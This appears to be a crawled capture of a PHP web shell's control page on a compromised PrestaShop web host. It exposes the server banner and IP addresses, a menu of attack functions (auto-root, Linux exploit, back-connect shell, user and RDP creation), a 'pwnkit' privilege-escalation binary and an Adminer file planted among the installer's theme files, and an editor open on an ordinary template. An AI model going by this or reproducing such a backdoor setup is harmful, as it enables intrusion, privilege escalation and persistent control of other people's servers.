Linux webm004.cluster102.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.102.20.4 | : 216.73.217.153
Cant Read [ /etc/named.conf ]
5.4.45
opusyn1t
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
opusyn1t /
www /
boutique /
install /
theme /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
autoload_classmap.php
0
B
-r--r--r--
configure.phtml
8.42
KB
-rw----r--
database.phtml
3.15
KB
-rw----r--
footer.phtml
2.19
KB
-rw----r--
header.phtml
4.89
KB
-rw----r--
index.php
1.24
KB
-rw----r--
license.phtml
1.52
KB
-rw----r--
license_content.phtml
21.16
KB
-rw----r--
process.phtml
5.2
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
system.phtml
1.49
KB
-rw----r--
welcome.phtml
2.17
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : system.phtml
<?php $this->displayTemplate('header') ?> <h2><?php echo $this->l('We are currently checking PrestaShop compatibility with your system environment') ?></h2> <p><?php echo $this->l('If you have any questions, please visit our <a href="%1$s" target="_blank">documentation</a> and <a href="%2$s" target="_blank">community forum</a>.', $this->getDocumentationLink(), $this->getForumLink()); ?></p> <?php if ($this->tests['required']['success']): ?> <h3 class="okBlock"><?php echo $this->l('PrestaShop compatibility with your system environment has been verified!') ?></h3> <?php else: ?> <h3 class="errorBlock"><?php echo $this->l('Oops! Please correct the item(s) below, and then click "Refresh information" to test the compatibility of your new system.') ?></h3> <?php endif; ?> <!-- Display tests results --> <?php foreach ($this->tests_render as $type => $categories): ?> <ul id="<?php echo $type ?>"> <?php foreach ($categories as $category): ?> <li class="title <?php if ($category['success'] == 1): ?>ok<?php endif;?>"><?php echo $category['title'] ?></li> <?php $i = 0; foreach ($category['checks'] as $id => $lang): ?> <li class="required <?php if ($i == 0): ?>first<?php endif;?> <?php echo $this->tests[$type]['checks'][$id] ?>"> <?php echo $lang ?> </li> <?php $i++; endforeach; ?> <?php endforeach; ?> </ul> <?php endforeach; ?> <p><input class="button" value="<?php echo $this->l('Refresh these settings')?> " type="submit" id="req_bt_refresh" /></p> <?php $this->displayTemplate('footer') ?>
Close